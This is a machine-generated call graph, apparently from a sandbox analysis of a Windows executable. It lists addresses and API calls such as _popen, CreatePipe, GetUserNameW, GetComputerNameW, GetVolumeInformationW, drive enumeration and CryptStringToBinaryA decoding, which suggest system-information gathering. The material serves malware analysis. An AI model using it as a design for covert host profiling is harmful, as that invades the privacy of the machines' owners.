4750->4752 4751->4749 4751->4750 4752->4748 4754 7ff65e1fda0a malloc 4753->4754 4755 7ff65e1f52c1 4754->4755 4756 7ff65e1fd9fb 4754->4756 4755->4725 4755->4732 4756->4754 4757 7ff65e1fda1a 4756->4757 4758 7ff65e1fda25 4757->4758 4767 7ff65e1fe1ec 4757->4767 4760 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4758->4760 4761 7ff65e1fda2b free 4760->4761 4765 7ff65e1f112e Concurrency::cancel_current_task 4764->4765 4766 7ff65e1f113f __std_exception_copy 4765->4766 4766->4727 4770 7ff65e1fe1cc 4767->4770 4769 7ff65e1fe1fa _CxxThrowException 4770->4769 4773 7ff65e1f3591 4772->4773 4774 7ff65e1f34c6 4772->4774 5114 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 4773->5114 4775 7ff65e1f34cc memmove 4774->4775 4779 7ff65e1f34ec 4774->4779 4775->4645 4777 7ff65e1f34fd 4781 7ff65e1fd9f0 4 API calls 4777->4781 4778 7ff65e1f3596 4782 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4778->4782 4779->4777 4779->4778 4780 7ff65e1f3518 memmove 4779->4780 4784 7ff65e1f355d 4779->4784 4780->4645 4786 7ff65e1f3513 4781->4786 4787 7ff65e1f359c 4782->4787 4785 7ff65e1fd9f0 4 API calls 4784->4785 4785->4780 4786->4780 4788 7ff65e1f3556 _invalid_parameter_noinfo_noreturn 4786->4788 4788->4784 4790 7ff65e1fd9f0 4 API calls 4789->4790 4791 7ff65e1f2209 ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 4790->4791 4792 7ff65e1f2274 4791->4792 4793 7ff65e1f2cc0 4792->4793 4813 7ff65e1f2d2e 4793->4813 4794 7ff65e1f3040 4795 7ff65e1f2f84 4794->4795 4798 7ff65e1f2f7f 4794->4798 4801 7ff65e1f3089 _invalid_parameter_noinfo_noreturn 4794->4801 4797 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4795->4797 4796 7ff65e1f2d60 ?out@?$codecvt@_WDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEB_W1AEAPEB_WPEAD3AEAPEAD 4796->4813 4800 7ff65e1f2f93 4797->4800 4799 7ff65e1fda34 _Receive_impl free 4798->4799 4799->4795 4825 7ff65e1f20b0 4800->4825 4803 7ff65e1f3090 4801->4803 4802 7ff65e1f2ef8 4806 7ff65e1f3095 4802->4806 5178 7ff65e1f2a40 4802->5178 5200 7ff65e1f12c0 4803->5200 4804 7ff65e1f2e2c memmove 4804->4813 4805 7ff65e1f2fa7 4805->4803 4811 7ff65e1f2a40 13 API calls 4805->4811 4812 7ff65e1f12c0 Concurrency::cancel_current_task 11 API calls 4806->4812 4816 7ff65e1f2fbe 4811->4816 4817 7ff65e1f309b 4812->4817 4813->4794 4813->4796 4813->4802 4813->4804 4813->4805 5115 7ff65e1f35a0 4813->5115 5135 7ff65e1f38c0 4813->5135 5158 7ff65e1f3710 4813->5158 4815 7ff65e1f2f0f 4818 7ff65e1f2f48 4815->4818 4819 7ff65e1f2f43 4815->4819 4821 7ff65e1f2fee _invalid_parameter_noinfo_noreturn 4815->4821 4816->4818 4820 7ff65e1f2ff5 4816->4820 4816->4821 4818->4795 4818->4798 4824 7ff65e1f3039 _invalid_parameter_noinfo_noreturn 4818->4824 4822 7ff65e1fda34 _Receive_impl free 4819->4822 4823 7ff65e1fda34 _Receive_impl free 4820->4823 4821->4820 4822->4818 4823->4818 4824->4794 4826 7ff65e1f20d1 4825->4826 4827 7ff65e1f2107 4825->4827 4829 7ff65e1f218d _invalid_parameter_noinfo_noreturn 4826->4829 4830 7ff65e1fda34 _Receive_impl free 4826->4830 4828 7ff65e1f2150 4827->4828 4827->4829 4831 7ff65e1f2148 4827->4831 4828->4653 4830->4827 4832 7ff65e1fda34 _Receive_impl free 4831->4832 4832->4828 4834 7ff65e1f34a0 8 API calls 4833->4834 4835 7ff65e1f14b3 4834->4835 4836 7ff65e1f1556 4835->4836 4840 7ff65e1f14d3 memmove memmove memmove 4835->4840 5226 7ff65e1f3c80 4836->5226 4839 7ff65e1f1568 4841 7ff65e1f15d7 _popen 4839->4841 4842 7ff65e1f15d2 4839->4842 4846 7ff65e1f15cb _invalid_parameter_noinfo_noreturn 4839->4846 4840->4839 4843 7ff65e1f16a0 fgets 4841->4843 4844 7ff65e1f1616 4841->4844 4847 7ff65e1fda34 _Receive_impl free 4842->4847 4845 7ff65e1f170e _pclose 4843->4845 4856 7ff65e1f16c4 4843->4856 4848 7ff65e1f34a0 8 API calls 4844->4848 4849 7ff65e1f1670 4845->4849 4850 7ff65e1f1633 4845->4850 4846->4842 4847->4841 4848->4850 4852 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4849->4852 4850->4849 4851 7ff65e1f166b 4850->4851 4853 7ff65e1f1776 _invalid_parameter_noinfo_noreturn 4850->4853 4854 7ff65e1fda34 _Receive_impl free 4851->4854 4855 7ff65e1f167f 4852->4855 4854->4849 4855->4665 5220 7ff65e1f3200 4856->5220 4858 7ff65e1f16f7 fgets 4858->4845 4858->4856 4860 7ff65e1f34a0 8 API calls 4859->4860 4861 7ff65e1f17e0 GetLogicalDriveStringsA 4860->4861 4862 7ff65e1f1bc2 4861->4862 4863 7ff65e1f1802 4861->4863 4865 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4862->4865 4863->4862 4864 7ff65e1f180d memset ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 4863->4864 4868 7ff65e1f1a75 4864->4868 4882 7ff65e1f18ba 4864->4882 4866 7ff65e1f1bd4 4865->4866 4887 7ff65e1f85b0 4866->4887 4867 7ff65e1f34a0 8 API calls 4869 7ff65e1f18e3 GetDriveTypeA 4867->4869 4870 7ff65e1f1b07 4868->4870 4871 7ff65e1f30a0 9 API calls 4868->4871 4869->4882 4872 7ff65e1f1b42 4870->4872 4876 7ff65e1f30a0 9 API calls 4870->4876 4871->4870 4874 7ff65e1f1b83 4872->4874 4877 7ff65e1f1b7e 4872->4877 4880 7ff65e1f1b77 _invalid_parameter_noinfo_noreturn 4872->4880 4875 7ff65e1f2870 _Receive_impl 4 API calls 4874->4875 4878 7ff65e1f1bae ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 4875->4878 4876->4872 4881 7ff65e1fda34 _Receive_impl free 4877->4881 4878->4862 4879 7ff65e1f3ac0 9 API calls 4879->4882 4880->4877 4881->4874 4882->4867 4882->4868 4882->4879 4883 7ff65e1f1a67 _invalid_parameter_noinfo_noreturn 4882->4883 4884 7ff65e1fda34 free _Receive_impl 4882->4884 4885 7ff65e1f1a6e _invalid_parameter_noinfo_noreturn 4882->4885 5247 7ff65e1f30a0 4882->5247 5267 7ff65e1f32e0 4882->5267 4883->4885 4884->4882 4885->4868 4888 7ff65e1f86e7 4887->4888 4893 7ff65e1f860f 4887->4893 4889 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4888->4889 4891 7ff65e1f86fb 4889->4891 4891->4699 4894 7ff65e1f8668 4893->4894 4896 7ff65e1f8710 4893->4896 4897 7ff65e1f8649 4893->4897 4901 7ff65e1f8715 4893->4901 4902 7ff65e1f8653 4893->4902 4895 7ff65e1fd9f0 4 API calls 4894->4895 4895->4902 4898 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4896->4898 4900 7ff65e1fd9f0 4 API calls 4897->4900 4898->4901 4899 7ff65e1f2a40 13 API calls 4899->4902 4903 7ff65e1f864e 4900->4903 5283 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 4901->5283 4902->4888 4902->4899 4903->4902 4904 7ff65e1f8661 _invalid_parameter_noinfo_noreturn 4903->4904 4904->4894 4906 7ff65e1f34a0 8 API calls 4905->4906 4907 7ff65e1f7108 4906->4907 5284 7ff65e1f6000 4907->5284 4910 7ff65e1f715c 5307 7ff65e1fa640 4910->5307 4911 7ff65e1f7157 4914 7ff65e1fda34 _Receive_impl free 4911->4914 4913 7ff65e1f7150 _invalid_parameter_noinfo_noreturn 4913->4911 4914->4910 4916 7ff65e1fd9f0 4 API calls 4917 7ff65e1f71b2 4916->4917 4918 7ff65e1f34a0 8 API calls 4917->4918 4919 7ff65e1f71f0 4918->4919 5348 7ff65e1f6440 4919->5348 4923 7ff65e1f7266 4924 7ff65e1f8e00 55 API calls 4923->4924 4925 7ff65e1f72cc 4924->4925 4926 7ff65e1f8e00 55 API calls 4925->4926 4927 7ff65e1f7317 4926->4927 4928 7ff65e1fa640 20 API calls 4927->4928 4929 7ff65e1f7366 4928->4929 4930 7ff65e1fa640 20 API calls 4929->4930 4931 7ff65e1f7396 6 API calls 4930->4931 4932 7ff65e1f74b0 4931->4932 4932->4932 5468 7ff65e1fb100 4932->5468 4935 7ff65e1f759b 4936 7ff65e1fa640 20 API calls 4935->4936 4938 7ff65e1f75bf 4936->4938 4937 7ff65e1f30a0 9 API calls 4937->4935 4939 7ff65e1fd9f0 4 API calls 4938->4939 4940 7ff65e1f75ce 4939->4940 4941 7ff65e1f34a0 8 API calls 4940->4941 4942 7ff65e1f7613 4941->4942 5495 7ff65e1fc6e0 4942->5495 4945 7ff65e1f763a 4947 7ff65e1f7db4 4945->4947 4948 7ff65e1f7652 4945->4948 4946 7ff65e1fd9f0 4 API calls 4946->4945 5579 7ff65e1fb3b0 4947->5579 4949 7ff65e1f7685 4948->4949 4951 7ff65e1f767d 4948->4951 4952 7ff65e1f7687 4948->4952 4950 7ff65e1f34a0 8 API calls 4949->4950 4955 7ff65e1f76dd 4950->4955 5564 7ff65e1fcb90 4951->5564 4952->4949 5572 7ff65e1f9f80 4952->5572 4957 7ff65e1fc6e0 50 API calls 4955->4957 4960 7ff65e1f76ea 4957->4960 4962 7ff65e1fa640 20 API calls 4960->4962 4964 7ff65e1f771a 4962->4964 4963 7ff65e1f7dfb 5615 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 4963->5615 5520 7ff65e1f8ae0 memset 4964->5520 4967 7ff65e1f7e00 4968 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 4967->4968 4975 7ff65e1f7e05 4968->4975 4969 7ff65e1f7875 4969->4963 4978 7ff65e1f788f 4969->4978 4970 7ff65e1f7730 4970->4969 4972 7ff65e1f3200 13 API calls 4970->4972 4980 7ff65e1f35a0 9 API calls 4970->4980 4971 7ff65e1f7946 memmove 4974 7ff65e1f3200 13 API calls 4971->4974 4972->4970 4973 7ff65e1f78d4 4981 7ff65e1fd9f0 4 API calls 4973->4981 4976 7ff65e1f79ae 4974->4976 4979 7ff65e1f83b8 4975->4979 4984 7ff65e1f34a0 8 API calls 4975->4984 4982 7ff65e1f3200 13 API calls 4976->4982 4977 7ff65e1f78f2 4977->4971 4978->4967 4978->4971 4978->4973 4978->4977 4983 7ff65e1f7939 4978->4983 4985 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 4979->4985 4980->4970 4986 7ff65e1f78ed 4981->4986 4987 7ff65e1f7a0b 4982->4987 4988 7ff65e1fd9f0 4 API calls 4983->4988 4989 7ff65e1f7e84 GetUserNameW 4984->4989 4990 7ff65e1f83c7 4985->4990 4986->4977 4991 7ff65e1f7932 _invalid_parameter_noinfo_noreturn 4986->4991 4992 7ff65e1f7a8b 4987->4992 4995 7ff65e1f7a86 4987->4995 4998 7ff65e1f7a7f _invalid_parameter_noinfo_noreturn 4987->4998 4988->4977 4993 7ff65e1f21a0 10 API calls 4989->4993 4990->4707 4991->4983 4996 7ff65e1f7ad6 4992->4996 5000 7ff65e1f7ad1 4992->5000 5004 7ff65e1f7aca _invalid_parameter_noinfo_noreturn 4992->5004 4994 7ff65e1f7eaf 4993->4994 5002 7ff65e1f2cc0 42 API calls 4994->5002 4999 7ff65e1fda34 _Receive_impl free 4995->4999 5534 7ff65e1f61c0 CreatePipe 4996->5534 4998->4995 4999->4992 5001 7ff65e1fda34 _Receive_impl free 5000->5001 5001->4996 5005 7ff65e1f7edf 5002->5005 5004->5000 5007 7ff65e1f20b0 _Receive_impl 2 API calls 5005->5007 5006 7ff65e1f4530 9 API calls 5008 7ff65e1f7b1c 5006->5008 5009 7ff65e1f7eec 5007->5009 5550 7ff65e1f3ac0 5008->5550 5011 7ff65e1f34a0 8 API calls 5009->5011 5013 7ff65e1f7f15 GetComputerNameW 5011->5013 5016 7ff65e1f21a0 10 API calls 5013->5016 5014 7ff65e1f7b65 5017 7ff65e1f7b98 5014->5017 5021 7ff65e1f7b91 _invalid_parameter_noinfo_noreturn 5014->5021 5015 7ff65e1f7b9d 5018 7ff65e1f7bff 5015->5018 5023 7ff65e1f7bfa 5015->5023 5024 7ff65e1f7bf3 _invalid_parameter_noinfo_noreturn 5015->5024 5020 7ff65e1f7f40 5016->5020 5022 7ff65e1fda34 _Receive_impl free 5017->5022 5019 7ff65e1f7c56 5018->5019 5026 7ff65e1f7c51 5018->5026 5029 7ff65e1f7c4a _invalid_parameter_noinfo_noreturn 5018->5029 5027 7ff65e1f7cb8 5019->5027 5031 7ff65e1f7cb3 5019->5031 5034 7ff65e1f7cac _invalid_parameter_noinfo_noreturn 5019->5034 5032 7ff65e1f2cc0 42 API calls 5020->5032 5021->5017 5022->5015 5025 7ff65e1fda34 _Receive_impl free 5023->5025 5024->5023 5025->5018 5030 7ff65e1fda34 _Receive_impl free 5026->5030 5028 7ff65e1f2870 _Receive_impl 4 API calls 5027->5028 5033 7ff65e1f7d03 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5028->5033 5029->5026 5030->5019 5035 7ff65e1fda34 _Receive_impl free 5031->5035 5036 7ff65e1f7f70 5032->5036 5037 7ff65e1fa640 20 API calls 5033->5037 5034->5031 5035->5027 5038 7ff65e1f20b0 _Receive_impl 2 API calls 5036->5038 5040 7ff65e1f7d35 5037->5040 5039 7ff65e1f7f7d 5038->5039 5041 7ff65e1f34a0 8 API calls 5039->5041 5042 7ff65e1f7d7c 5040->5042 5044 7ff65e1f7d77 5040->5044 5047 7ff65e1f7d70 _invalid_parameter_noinfo_noreturn 5040->5047 5043 7ff65e1f7fa6 5041->5043 5045 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5042->5045 5046 7ff65e1f1450 38 API calls 5043->5046 5048 7ff65e1fda34 _Receive_impl free 5044->5048 5049 7ff65e1f7d8d 5045->5049 5050 7ff65e1f7fb0 5046->5050 5047->5044 5048->5042 5049->4707 5051 7ff65e1f34a0 8 API calls 5050->5051 5052 7ff65e1f7fd9 GetVolumeInformationW 5051->5052 5053 7ff65e1f808e 5052->5053 5054 7ff65e1f8029 5052->5054 5055 7ff65e1f34a0 8 API calls 5053->5055 5077 7ff65e1f808c 5053->5077 5056 7ff65e1f3280 __stdio_common_vswprintf_s 5054->5056 5055->5077 5058 7ff65e1f8043 5056->5058 5057 7ff65e1f34a0 8 API calls 5059 7ff65e1f80dc memset GetVersionExW 5057->5059 5060 7ff65e1f21a0 10 API calls 5058->5060 5061 7ff65e1f8113 GetModuleHandleW GetProcAddress 5059->5061 5062 7ff65e1f810c 5059->5062 5063 7ff65e1f804f 5060->5063 5064 7ff65e1f8135 5061->5064 5065 7ff65e1f8139 5061->5065 5066 7ff65e1f8195 5062->5066 5067 7ff65e1f81e3 5062->5067 5068 7ff65e1f2cc0 42 API calls 5063->5068 5064->5062 5076 7ff65e1f1390 __stdio_common_vswprintf 5065->5076 5071 7ff65e1f21a0 10 API calls 5066->5071 5069 7ff65e1f81e1 5067->5069 5070 7ff65e1f34a0 8 API calls 5067->5070 5072 7ff65e1f807f 5068->5072 5074 7ff65e1f34a0 8 API calls 5069->5074 5070->5069 5075 7ff65e1f81a1 5071->5075 5073 7ff65e1f20b0 _Receive_impl 2 API calls 5072->5073 5073->5077 5078 7ff65e1f8249 5074->5078 5080 7ff65e1f2cc0 42 API calls 5075->5080 5076->5064 5077->5057 5079 7ff65e1f1780 52 API calls 5078->5079 5081 7ff65e1f8256 5079->5081 5082 7ff65e1f81d4 5080->5082 5083 7ff65e1f85b0 23 API calls 5081->5083 5084 7ff65e1f20b0 _Receive_impl 2 API calls 5082->5084 5085 7ff65e1f828f 5083->5085 5084->5069 5086 7ff65e1f34a0 8 API calls 5085->5086 5087 7ff65e1f82da 5086->5087 5088 7ff65e1f70a0 204 API calls 5087->5088 5093 7ff65e1f82ed 5088->5093 5089 7ff65e1f8342 5090 7ff65e1f8395 5089->5090 5091 7ff65e1f8390 5089->5091 5094 7ff65e1f8389 _invalid_parameter_noinfo_noreturn 5089->5094 5092 7ff65e1f9ea0 24 API calls 5090->5092 5096 7ff65e1fda34 _Receive_impl free 5091->5096 5092->4979 5093->5089 5093->5094 5095 7ff65e1fda34 _Receive_impl free 5093->5095 5094->5091 5095->5089 5096->5090 5890 7ff65e1f1010 5097->5890 5099 7ff65e1f32a6 __stdio_common_vswprintf_s 5099->4673 5101 7ff65e1f13ce 5100->5101 5103 7ff65e1f13b3 5100->5103 5102 7ff65e1f13e8 __stdio_common_vswprintf 5101->5102 5102->5103 5103->4679 5105 7ff65e1f9eb9 5104->5105 5112 7ff65e1f9f33 5104->5112 5106 7ff65e1f9ed8 5105->5106 5891 7ff65e1f83e0 5105->5891 5108 7ff65e1f9f28 5106->5108 5109 7ff65e1f9f4b _invalid_parameter_noinfo_noreturn 5106->5109 5110 7ff65e1fda34 _Receive_impl free 5108->5110 5111 7ff65e1fa640 20 API calls 5109->5111 5110->5112 5113 7ff65e1f9f70 5111->5113 5112->4642 5113->4642 5116 7ff65e1f35d0 5115->5116 5117 7ff65e1f36f9 5115->5117 5121 7ff65e1f3660 5116->5121 5122 7ff65e1f3628 5116->5122 5123 7ff65e1f361b 5116->5123 5127 7ff65e1f3635 5116->5127 5203 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5117->5203 5119 7ff65e1f36fe 5124 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5119->5124 5120 7ff65e1fd9f0 4 API calls 5120->5123 5129 7ff65e1fd9f0 4 API calls 5121->5129 5122->5119 5122->5127 5125 7ff65e1f367c memmove 5123->5125 5126 7ff65e1f36c7 memmove 5123->5126 5128 7ff65e1f36c0 _invalid_parameter_noinfo_noreturn 5123->5128 5130 7ff65e1f3704 5124->5130 5131 7ff65e1f369e 5125->5131 5132 7ff65e1f36b3 5125->5132 5133 7ff65e1f36be 5126->5133 5127->5120 5128->5126 5129->5123 5131->5128 5131->5132 5134 7ff65e1fda34 _Receive_impl free 5132->5134 5133->4813 5134->5133 5136 7ff65e1f3a39 5135->5136 5139 7ff65e1f38f8 5135->5139 5204 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5136->5204 5138 7ff65e1f3a3e 5141 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5138->5141 5142 7ff65e1f3950 5139->5142 5143 7ff65e1f3988 5139->5143 5147 7ff65e1f395d 5139->5147 5150 7ff65e1f3943 5139->5150 5140 7ff65e1fd9f0 4 API calls 5140->5150 5144 7ff65e1f3a44 ?uncaught_exceptions@std@ 5141->5144 5142->5138 5142->5147 5149 7ff65e1fd9f0 4 API calls 5143->5149 5151 7ff65e1f3a63 ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5144->5151 5152 7ff65e1f3a6d 5144->5152 5145 7ff65e1f39fc 5156 7ff65e1f3a04 memmove 5145->5156 5146 7ff65e1f39a8 memmove memmove 5153 7ff65e1f39d3 5146->5153 5154 7ff65e1f39e8 5146->5154 5147->5140 5148 7ff65e1f39f5 _invalid_parameter_noinfo_noreturn 5148->5145 5149->5150 5150->5145 5150->5146 5150->5148 5151->5152 5152->4813 5153->5148 5153->5154 5155 7ff65e1fda34 _Receive_impl free 5154->5155 5157 7ff65e1f39f3 5155->5157 5156->5157 5157->4813 5159 7ff65e1f38a6 5158->5159 5162 7ff65e1f373f 5158->5162 5205 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5159->5205 5161 7ff65e1f38ab 5166 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5161->5166 5164 7ff65e1f379c 5162->5164 5165 7ff65e1f37d8 5162->5165 5170 7ff65e1f37a9 5162->5170 5171 7ff65e1f378f 5162->5171 5163 7ff65e1fd9f0 4 API calls 5163->5171 5164->5161 5164->5170 5173 7ff65e1fd9f0 4 API calls 5165->5173 5169 7ff65e1f38b1 5166->5169 5167 7ff65e1f3862 memmove 5177 7ff65e1f3859 5167->5177 5168 7ff65e1f380d memmove memset 5174 7ff65e1f384e 5168->5174 5175 7ff65e1f3839 5168->5175 5170->5163 5171->5167 5171->5168 5172 7ff65e1f385b _invalid_parameter_noinfo_noreturn 5171->5172 5172->5167 5173->5171 5176 7ff65e1fda34 _Receive_impl free 5174->5176 5175->5172 5175->5174 5176->5177 5177->4813 5179 7ff65e1f2a6e 5178->5179 5180 7ff65e1f2a84 5179->5180 5181 7ff65e1f2b49 5179->5181 5182 7ff65e1f2a8a 5180->5182 5184 7ff65e1f2b4e 5180->5184 5185 7ff65e1f2b1e memmove 5180->5185 5186 7ff65e1f2aba 5180->5186 5187 7ff65e1f2b19 5180->5187 5206 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5181->5206 5182->4815 5188 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5184->5188 5185->4815 5189 7ff65e1fd9f0 4 API calls 5186->5189 5190 7ff65e1fd9f0 4 API calls 5187->5190 5191 7ff65e1f2b54 5188->5191 5192 7ff65e1f2ad0 5189->5192 5190->5185 5207 7ff65e1f2870 5191->5207 5194 7ff65e1f2b12 _invalid_parameter_noinfo_noreturn 5192->5194 5195 7ff65e1f2ad8 5192->5195 5194->5187 5195->5185 5197 7ff65e1f2bca 5199 7ff65e1fda34 _Receive_impl free 5197->5199 5198 7ff65e1f2bdb 5198->4815 5199->5198 5217 7ff65e1f1250 __std_exception_copy 5200->5217 5208 7ff65e1f28df ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 5207->5208 5213 7ff65e1f2889 5207->5213 5209 7ff65e1f2920 _invalid_parameter_noinfo_noreturn 5208->5209 5210 7ff65e1f2974 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 5209->5210 5211 7ff65e1f2943 5209->5211 5210->5197 5210->5198 5212 7ff65e1f296c 5211->5212 5214 7ff65e1f298b _invalid_parameter_noinfo_noreturn 5211->5214 5215 7ff65e1fda34 _Receive_impl free 5212->5215 5213->5209 5216 7ff65e1fda34 _Receive_impl free 5213->5216 5215->5210 5216->5208 5218 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5217->5218 5219 7ff65e1f12b2 _CxxThrowException __std_exception_copy 5218->5219 5219->4806 5221 7ff65e1f3262 5220->5221 5222 7ff65e1f3223 memmove 5220->5222 5223 7ff65e1f38c0 12 API calls 5221->5223 5222->4858 5225 7ff65e1f3275 5223->5225 5225->4858 5227 7ff65e1f3cb0 5226->5227 5228 7ff65e1f3de8 5226->5228 5232 7ff65e1f3d40 5227->5232 5233 7ff65e1f3d08 5227->5233 5234 7ff65e1f3cfb 5227->5234 5238 7ff65e1f3d15 5227->5238 5246 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5228->5246 5230 7ff65e1f3ded 5235 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5230->5235 5231 7ff65e1fd9f0 4 API calls 5231->5234 5240 7ff65e1fd9f0 4 API calls 5232->5240 5233->5230 5233->5238 5236 7ff65e1f3db4 memmove memmove 5234->5236 5237 7ff65e1f3d67 memmove memmove 5234->5237 5239 7ff65e1f3dad _invalid_parameter_noinfo_noreturn 5234->5239 5241 7ff65e1f3df3 5235->5241 5244 7ff65e1f3dab 5236->5244 5242 7ff65e1f3da0 5237->5242 5243 7ff65e1f3d8b 5237->5243 5238->5231 5239->5236 5240->5234 5245 7ff65e1fda34 _Receive_impl free 5242->5245 5243->5239 5243->5242 5244->4839 5245->5244 5248 7ff65e1f30bd memmove 5247->5248 5249 7ff65e1f30e7 5247->5249 5248->4882 5251 7ff65e1f31ec 5249->5251 5253 7ff65e1f3141 5249->5253 5257 7ff65e1f3179 5249->5257 5258 7ff65e1f3133 5249->5258 5282 7ff65e1f11c0 ?_Xlength_error@std@@YAXPEBD 5251->5282 5254 7ff65e1f31f1 5253->5254 5255 7ff65e1fd9f0 4 API calls 5253->5255 5259 7ff65e1f1120 Concurrency::cancel_current_task __std_exception_copy 5254->5259 5255->5258 5256 7ff65e1f3181 memmove 5262 7ff65e1f31a2 5256->5262 5263 7ff65e1f31cf 5256->5263 5261 7ff65e1fd9f0 4 API calls 5257->5261 5258->5256 5264 7ff65e1f31e5 _invalid_parameter_noinfo_noreturn 5258->5264 5260 7ff65e1f31f7 5259->5260 5261->5258 5262->5264 5265 7ff65e1f31c7 5262->5265 5263->4882 5264->5251 5266 7ff65e1fda34 _Receive_impl free 5265->5266 5266->5263 5268 7ff65e1f331f ?good@ios_base@std@ 5267->5268 5269 7ff65e1f3318 5267->5269 5270 7ff65e1f3333 5268->5270 5277 7ff65e1f3361 5268->5277 5269->5268 5274 7ff65e1f3349 ?flush@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12 ?good@ios_base@std@ 5270->5274 5270->5277 5271 7ff65e1f343a ?setstate@?$basic_ios@DU?$char_traits@D@std@@@std@@QEAAXH_N ?uncaught_exceptions@std@ 5272 7ff65e1f3474 5271->5272 5273 7ff65e1f346a ?_Osfx@?$basic_ostream@DU?$char_traits@D@std@@@std@ 5271->5273 5272->4882 5273->5272 5274->5277 5275 7ff65e1f33d4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5276 7ff65e1f33f4 5275->5276 5278 7ff65e1f342a 5276->5278 5281 7ff65e1f33fd ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5276->5281 5277->5271 5277->5275 5277->5278 5279 7ff65e1f33a4 ?sputc@?$basic_streambuf@DU?$char_traits@D@std@@@std@@QEAAHD 5277->5279 5280 7ff65e1f33d1 5277->5280 5278->5271 5279->5277 5280->5275 5281->5276 5285 7ff65e1f6045 CryptStringToBinaryA 5284->5285 5286 7ff65e1f6042 5284->5286 5287 7ff65e1f6073 5285->5287 5288 7ff65e1f619b 5285->5288 5286->5285 5290 7ff65e1f60b0 CryptStringToBinaryA 5287->5290 5616 7ff65e1fc8d0 5287->5616 5289 7ff65e1f11e0 9 API calls 5288->5289 5291 7ff65e1f61ac _CxxThrowException 5289->5291 5294 7ff65e1f60ed 5290->5294 5295 7ff65e1f6178 5290->5295 5297 7ff65e1f34a0 8 API calls 5294->5297 5632 7ff65e1f11e0 __std_exception_copy 5295->5632 5296 7ff65e1f6098 memset 5296->5290 5299 7ff65e1f610d 5297->5299 5301 7ff65e1f614d 5299->5301 5302 7ff65e1f6148 5299->5302 5304 7ff65e1f6141 _invalid_parameter_noinfo_noreturn 5299->5304 5303 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5301->5303 5305 7ff65e1fda34 _Receive_impl free 5302->5305 5306 7ff65e1f6160 5303->5306 5304->5302 5305->5301 5306->4910 5306->4911 5306->4913 5308 7ff65e1fa67d 5307->5308 5309 7ff65e1faad9 5308->5309 5310 7ff65e1fa73d 5308->5310 5311 7ff65e1fa6b7 5308->5311 5334 7ff65e1fa9be 5308->5334 5312 7ff65e1fd9d0 Concurrency::cancel_current_task 8 API calls 5309->5312 5315 7ff65e1fab03 5310->5315 5316 7ff65e1fa759 5310->5316 5338 7ff65e1fa766 5310->5338 5313 7ff65e1fa6e7 5311->5313 5311->5315 5319 7ff65e1fa6da 5311->5319 5314 7ff65e1f7195 5312->5314 5347 7ff65e1fa734 5313->5347 5646 7ff65e1fccf0 5313->5646 5314->4916 5678 7ff65e1faec0 ?_Xlength_error@std@@YAXPEBD 5315->5678 5324 7ff65e1fc3a0 5 API calls 5316->5324 5317 7ff65e1fa9e1 5321 7ff65e1faa9b 5317->5321 5327 7ff65e1faa45 5317->5327 5336 7ff65e1fa9ef 5317->5336 5318 7ff65e1faaaa 5323 7ff65e1fc470 19 API calls 5318->5323 5636 7ff65e1fc3a0 5319->5636 5328 7ff65e1faee0 19 API calls 5321->5328 5330 7ff65e1faabf 5323->5330 5324->5338 5325 7ff65e1fa9b5 5670 7ff65e1faee0 5325->5670 5335 7ff65e1faa76 5327->5335 5339 7ff65e1faa94 _invalid_parameter_noinfo_noreturn 5327->5339 5343 7ff65e1faa30 5327->5343 5328->5343 5333 7ff65e1fda34 _Receive_impl free 5330->5333 5332 7ff65e1fccf0 19 API calls 5332->5338 5333->5343 5334->5309 5334->5317 5334->5318 5340 7ff65e1fda34 _Receive_impl free 5335->5340 5336->5309 5337 7ff65e1faa28 5336->5337 5336->5339 5336->5343 5342 7ff65e1fda34 _Receive_impl free 5337->5342 5338->5332 5338->5347 5339->5321 5340->5343 5341 7ff65e1fda34 _Receive_impl free 5341->5309 5342->5343 5343->5341 5344 7ff65e1f7080 19 API calls 5344->5347 5346 7ff65e1fccf0 19 API calls 